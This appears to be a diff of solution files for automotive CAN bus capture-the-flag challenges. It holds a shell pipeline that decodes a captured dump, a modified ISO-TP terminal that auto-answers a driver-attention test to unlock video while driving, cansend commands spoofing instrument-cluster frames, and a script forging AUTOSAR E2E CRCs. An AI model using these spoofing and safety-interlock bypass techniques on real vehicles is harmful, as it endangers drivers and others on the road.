+67 18 1D 2D 40 5B F2
+55 24 EC 75 F2 A1 DE
+98 C8 4D B4 94 65 6E
+19 29 BC A2 C5 77 D4
+68 BA E6 35 1A 15 DD
+82 71 A3 F5 72 85 E6
+62 5B C2 E2 2D 16 46
+5D E6 46 DF 8A 6A 45
+51 F5 EE 5E F8 80 D6
+87 65 88 C9 54 4E F3
+FA C4 B6 8A F5 73 5B
+87 BE 1F 4D 41 D4 B1
+9E 79 F8 E9 03 EC 36
+BA C6 13 40 B9 DE 45
+6F A7 7D F5 30 C4 E2
+55 78 77 3F 4F FC F5
+42 7A 13 7D FB 18 CA
+26 F5 FA 98 F8 06 BF
+2C 24 3A D1 89 4E 74
+A2 FF 06 74 5A 5A 5A
+5A 5A 5A 5A DA 85 FD
+0B DA 17 18 4A 9E 9D
+FF B0 00 00 00 25 74
+45 58 74 64 61 74 65
+3A 63 72 65 61 74 65
+00 32 30 32 36 2D 30
+31 2D 31 39 54 31 33
+3A 33 35 3A 32 39 2B
+30 30 3A 30 30 7B E1
+1B E4 00 00 00 25 74
+45 58 74 64 61 74 65
+3A 6D 6F 64 69 66 79
+00 32 30 32 33 2D 30
+38 2D 31 31 54 31 32
+3A 32 38 3A 30 30 2B
+30 30 3A 30 30 D2 3E
+99 51 00 00 00 00 49
+45 4E 44 AE 42 60 82

6/CANsmit2/test.sh

@@ -0,0 +1 @@
+cut -d ' ' -f10-18 dump | sort | uniq | cut -d ' ' -f 2-8 | xxd -r -p | feh -

6/CANsmit3/Makefile

@@ -0,0 +1,71 @@
+#
+#  Copyright (c) 2002-2005 Volkswagen Group Electronic Research
+#  All rights reserved.
+#
+#  Redistribution and use in source and binary forms, with or without
+#  modification, are permitted provided that the following conditions
+#  are met:
+#  1. Redistributions of source code must retain the above copyright
+#     notice, this list of conditions, the following disclaimer and
+#     the referenced file 'COPYING'.
+#  2. Redistributions in binary form must reproduce the above copyright
+#     notice, this list of conditions and the following disclaimer in the
+#     documentation and/or other materials provided with the distribution.
+#  3. Neither the name of Volkswagen nor the names of its contributors
+#     may be used to endorse or promote products derived from this software
+#     without specific prior written permission.
+#
+#  Alternatively, provided that this notice is retained in full, this
+#  software may be distributed under the terms of the GNU General
+#  Public License ("GPL") version 2 as distributed in the 'COPYING'
+#  file from the main directory of the linux kernel source.
+#
+#  The provided data structures and external interfaces from this code
+#  are not restricted to be used by modules with a GPL compatible license.
+#
+#  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+#  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+#  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+#  A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+#  OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+#  SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+#  LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+#  DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+#  THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+#  (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+#  OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
+#  DAMAGE.
+#
+#  Send feedback to <linux-can@vger.kernel.org>
+
+DESTDIR ?=
+PREFIX ?= /usr/local
+
+MAKEFLAGS := -k
+
+CFLAGS := -O2 -Wall -Wno-parentheses
+
+CPPFLAGS += \
+	-Iinclude \
+	-DAF_CAN=PF_CAN \
+	-DPF_CAN=29 \
+	-DSO_RXQ_OVFL=40 \
+	-DSCM_TIMESTAMPING_OPT_STATS=54 \
+	-D_FILE_OFFSET_BITS=64 \
+	-D_GNU_SOURCE
+
+PROGRAMS := isotpterm
+
+all: $(PROGRAMS)
+
+clean:
+	rm -f $(PROGRAMS) *.o
+
+install:
+	mkdir -p $(DESTDIR)$(PREFIX)/bin
+	cp -f $(PROGRAMS) $(DESTDIR)$(PREFIX)/bin
+
+distclean:
+	rm -f $(PROGRAMS) $(LIBRARIES) *.o *~
+
+	$(CC) $(LDFLAGS) $^ $(LDLIBS) -o $@

6/CANsmit3/README

@@ -0,0 +1,15 @@
+Watch Offline Profile Reader
+----
+
+You've got the latest of entertainment systems in your new car, but the system
+can only be used while standing still. You want to watch your series in the
+background while driving though. It won't distract you, since you know all 23
+seasons by heart.
+
+The system requires you to prove you're not driving by testing your attention.
+You can't look away from the road that long, so you decide to write a script to
+help you unlock the feature for you.
+
+The system is tightly integrated with the rest of the car and communicates over
+ISOTP ports 241 and 242 on interface "wopr". Your profile's username is `falken`
+and your password is `Joshua`.

6/CANsmit3/isotpterm.c

@@ -0,0 +1,183 @@
+/*
+ * isotpterm.c - interactive terminal over isotp
+ */
+
+#include <errno.h>
+#include <libgen.h>
+#include <linux/can.h>
+#include <linux/can/isotp.h>
+#include <net/if.h>
+#include <netinet/in.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/uio.h>
+#include <sys/wait.h>
+#include <time.h>
+#include <unistd.h>
+
+#define NO_CAN_ID 0xFFFFFFFFU
+#define MAX_PDU_LENGTH 8000
+
+void print_usage(char *prg) {
+  fprintf(stderr,
+          "\nUsage: %s -s <can_id> -d <can_id> [options] <CAN interface>\n",
+          prg);
+  fprintf(stderr, "Options:\n");
+  fprintf(stderr,
+          "         -s <can_id>  * (source can_id. Use 8 digits for extended "
+          "IDs)\n");
+  fprintf(stderr,
+          "         -d <can_id>  * (destination can_id. Use 8 digits for "
+          "extended IDs)\n");
+  fprintf(stderr, "\n");
+}
+
+int main(int argc, char **argv) {
+  extern int optind, opterr, optopt;
+  int opt;
+
+  int sc = 0; /* (C)AN socket */
+  struct sockaddr_can caddr;
+  static struct can_isotp_options opts;
+
+  socklen_t caddrlen = sizeof(caddr);
+  fd_set readfds;
+
+  int nbytes;
+  int ret = 0;
+  char *fgetsret = NULL;
+
+  char txmsg[MAX_PDU_LENGTH];
+  char rxmsg[MAX_PDU_LENGTH];
+
+  /* mark missing mandatory commandline options as missing */
+  caddr.can_addr.tp.tx_id = caddr.can_addr.tp.rx_id = NO_CAN_ID;
+
+  while ((opt = getopt(argc, argv, "s:d:?")) != -1) {
+    switch (opt) {
+      case 's':
+        caddr.can_addr.tp.tx_id = strtoul(optarg, (char **)NULL, 16);
+        if (strlen(optarg) > 7) caddr.can_addr.tp.tx_id |= CAN_EFF_FLAG;
+        break;
+
+      case 'd':
+        caddr.can_addr.tp.rx_id = strtoul(optarg, (char **)NULL, 16);
+        if (strlen(optarg) > 7) caddr.can_addr.tp.rx_id |= CAN_EFF_FLAG;
+        break;
+
+      case '?':
+        print_usage(basename(argv[0]));
+        ret = 1; /* no proper operation (for non-interactive users) */
+        goto exit;
+
+      default:
+        fprintf(stderr, "Unknown option %c\n", opt);
+        print_usage(basename(argv[0]));
+        ret = 1;
+        goto exit;
+    }
+  }
+
+  if ((argc - optind != 1) || (caddr.can_addr.tp.tx_id == NO_CAN_ID) ||
+      (caddr.can_addr.tp.rx_id == NO_CAN_ID)) {
+    print_usage(basename(argv[0]));
+    ret = -EINVAL;
+    goto exit;
+  }
+
+  if ((sc = socket(PF_CAN, SOCK_DGRAM, CAN_ISOTP)) < 0) {
+    perror("socket");
+    ret = sc;
+    goto exit;
+  }
+
+  opts.flags = CAN_ISOTP_WAIT_TX_DONE;
+  setsockopt(sc, SOL_CAN_ISOTP, CAN_ISOTP_OPTS, &opts, sizeof(opts));
+
+  caddr.can_family = AF_CAN;
+  caddr.can_ifindex = if_nametoindex(argv[optind]);
+
+  ret = bind(sc, (struct sockaddr *)&caddr, caddrlen);
+  if (ret < 0) {
+    perror("bind");
+    goto exit;
+  }
+
+  while (1) {
+    FD_ZERO(&readfds);
+    FD_SET(STDIN_FILENO, &readfds);
+    FD_SET(sc, &readfds);
+
+    ret = select(sc + 1, &readfds, NULL, NULL, NULL);
+    if (ret < 0) {
+      perror("select");
+      goto exit;
+    }
+
+    if (FD_ISSET(sc, &readfds)) {
+      nbytes = read(sc, rxmsg, MAX_PDU_LENGTH - 1);
+
+      if (nbytes < 1) {
+        perror("read from isotp socket");
+        ret = nbytes;
+        goto exit;
+      }
+
+      rxmsg[nbytes] = 0; /* terminate string */
+      printf("%s", rxmsg);
+
+      if(strncmp(rxmsg, "\nwopr", 4)==0){
+	      send(sc, "falken\n", 7 , 0);
+      }
+      if(strncmp(rxmsg, "pass", 4)==0){
+	      send(sc, "Joshua\n", 7 , 0);
+      }
+      char *s = strstr(rxmsg, "Test#");
+      char c;
+      int j = 0;
+      if(s){
+	      printf("detected: %c\n", s[18]);
+	      c = s[18];
+	      while(s[0] != '\n')
+		      s++;
+
+	      s = strstr(rxmsg, "\n'");
+	      for(int i=0; i<strlen(s); i++)
+		      if(s[i] == c)
+			      j++;
+
+	      char msg[10];
+	      sprintf(msg, "%d\n", j);
+	      printf("aswering: %d\n", j);
+
+	      send(sc, msg, strlen(msg)+1, 0);
+      }
+      
+      fflush(stdout);
+
+    } else if (FD_ISSET(STDIN_FILENO, &readfds)) {
+      fgetsret = fgets(txmsg, MAX_PDU_LENGTH, stdin);
+      if (fgetsret == NULL) {
+        ret = 0;
+        goto exit;
+      }
+
+      nbytes = send(sc, txmsg, strlen(txmsg) + 1, 0);
+      if (nbytes != strlen(txmsg) + 1) {
+        perror("write to isotp socket");
+        ret = nbytes;
+        goto exit;
+      }
+    }
+  }
+
+exit:
+  close(sc);
+
+  return ret;
+}

6/CANstrument1

@@ -0,0 +1 @@
+cansend cluster0 100#0000C8

6/CANstrument2

@@ -0,0 +1 @@
+cansend cluster1 100#D300C80000000000

6/CANstrument3/test

@@ -0,0 +1,5 @@
+e2e profile2
+dataID for counter=0x0b is 0xd2
+calculate new crc for payload from previous task
+
+cansend cluster2 100#6f0bc80000000000

6/CANstrument3/test.py

@@ -0,0 +1,27 @@
+import e2e
+
+#cansend cluster1 100#D300C80000000000
+
+#b = bytearray(b"\x01\x00\x07\xAD\x07\x62\x08\x71\x62")
+#b = bytearray(b"\x00\x00\x00\x00\x00\x00\x00\x00")
+#b = bytearray(b"\x00\x00\x00\xB9\xE6\x6B\x06\x00")
+b =  bytearray(b"\x00\x0B\x10\x15\xC3\x2A\x4A\x00")
+#for i in range(0,255):
+#    b[0] = i
+#    print(hex(i), end='')
+#    print(" ", end='')
+#crc: int = e2e.crc.calculate_crc8_h2f(b)
+
+for i in range(0,255):
+    print(hex(i), end='')
+    print(" ", end='')
+    e2e.p02.e2e_p02_protect(b, 7, bytes([0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, i, 0x0d, 0x0e, 0x0f, 0x10]), increment_counter=False)
+    print(b.hex())
+
+#b =  bytearray(b"\x00\x0B\x10\x15\xC3\x2A\x4A\x00")
+e2e.p02.e2e_p02_protect(b, 7, bytes([0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0xd2, 0x0d, 0x0e, 0x0f, 0x10]), increment_counter=False)
+print(b.hex())
+
+b =  bytearray(b"\x00\x0B\xC8\x00\x00\x00\x00\x00")
+e2e.p02.e2e_p02_protect(b, 7, bytes([0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0xd2, 0x0d, 0x0e, 0x0f, 0x10]), increment_counter=False)
+print(b.hex())